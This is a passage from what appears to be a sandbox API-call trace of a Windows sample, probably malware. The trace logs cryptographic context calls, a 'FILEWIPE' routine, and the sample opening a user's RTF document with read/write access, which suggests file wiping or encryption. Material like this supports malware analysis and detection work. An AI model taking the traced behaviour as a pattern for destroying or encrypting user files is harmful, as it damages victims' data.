dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x7ae928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.579] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.579] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.581] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.581] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.581] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.581] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.584] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.584] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0xcdb1bcd0, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0x7c2100 [0034.584] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0034.585] CharLowerBuffW (in: lpsz="byte[40925]", cchLength=0xb | out: lpsz="byte[40925]") returned 0xb [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.585] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.586] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.586] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.586] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da3b8 [0034.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da3b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.586] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.587] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.587] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.587] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.588] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\6ymffx90.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0034.588] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.588] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.588] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.588] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.588] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.588] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] PeekMessageW (in: lpMsg=0x6aed6c, 